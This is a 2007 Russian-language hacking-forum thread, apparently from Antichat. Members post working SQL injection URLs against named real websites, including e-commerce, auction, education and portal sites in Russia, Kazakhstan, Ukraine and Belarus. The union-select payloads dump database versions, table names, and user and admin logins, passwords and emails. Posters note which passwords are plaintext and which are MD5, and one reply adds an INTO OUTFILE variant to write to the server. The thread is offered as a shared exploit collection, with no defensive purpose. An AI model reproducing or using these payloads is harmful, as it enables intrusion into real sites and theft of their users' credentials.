08.04.2007, 18:27
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Код:
http://www.sinotruck.ru/index.php?t=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17/*
Код:
http://www.musagetes.kz/konkurs/text_more.php?cid=5&tid=-1+union+select+1,2,3,concat(user(),char(58),version()),5,6,7/*
|
|
|
08.04.2007, 18:37
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами:
10307906
Репутация:
1365
|
|
www.npstoik.ru
«Современные Технологии
в Образовании и Культуре» :
Код:
http://www.npstoik.ru/vio/inside.php?ind=news2&key_news=-87+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5/*
|
|
|
|
08.04.2007, 19:12
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
www.prom.kz (Каталог предприятий)
Код:
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19,20+from+bx_prom_user+limit+2,1/*
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.TABLES+limit+34,1/*
|
|
|
|
08.04.2007, 19:40
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
http://lotok.com.ua
интернет-аукцион
таблицы: (99 шт.)
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+36,1/*
таблица юзеров #1
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(login,0x3a,password,0x3a,email)+from+ppusers+limit+0,1/*
#2
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_users/*
админ:
Код:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_admins/*
все пароли в MD5, пока не расшифровал)
Аукцион мб не особо крупный, но инфы в таблицах очень много.
Последний раз редактировалось n1†R0x; 08.04.2007 в 19:42..
|
|
|
|
08.04.2007, 20:03
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Вот собсна.. раскручена полностью. думаю вполне даже паблик)
http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,user,6,password,8,9,10,1 1,12,13,14,15,16,17,18,19+from+mysql.user/*
так же есть таблица users
http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,concat_ws(char(58),datab ase(),user(),version()),6,7,8,9,10,11,12,13,14,15, 16,17,18,19+from+users/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 08.04.2007 в 20:13..
|
|
|
|
08.04.2007, 20:16
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
Центр маркетингово-аналитических исследований
Код:
http://www.cmar.kz/index.php?id=15&PageLevelID=-154+union+select+user+from+mysql.user
таблица (password) есть но не выводится(:
Код:
http://www.women.unesco.kz/base.php?id=-4+union+select+concat(login,0x3a,pwd)+from+users+limit+4,1/*
пассы в чистом виде
Последний раз редактировалось XTErner; 08.04.2007 в 20:31..
|
|
|
|
08.04.2007, 20:35
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами:
10350730
Репутация:
337
|
|
Tut.by
Огроменный портал...
http://catalog.tut.by/list.phtml?form[catid]=8+union+select+1,2,3,4,5,6,7,8,9,10/*
Очевидно, юзеры в другой БД, имя которой я пока не угадал =(
___________
Таблиц не подобрал.
http://www.extremeua.com/index.php?lang=rus&c=4&base=RockArea&id=3+union+se lect+1,2,3,4,5,6,7
Последний раз редактировалось Fr-Ron; 08.04.2007 в 21:43..
|
|
|
|
08.04.2007, 20:57
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
|
|
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . . |
|
|
|
08.04.2007, 21:07
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Код:
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+16,1/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+168,1/*
|
|
|
|
08.04.2007, 21:46
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
С нами:
10129286
Репутация:
1477
|
|
Сообщение от KPOT_f!nd
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . . Зато мы подобрали. Ты немного переборщил. Вот как надо:
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
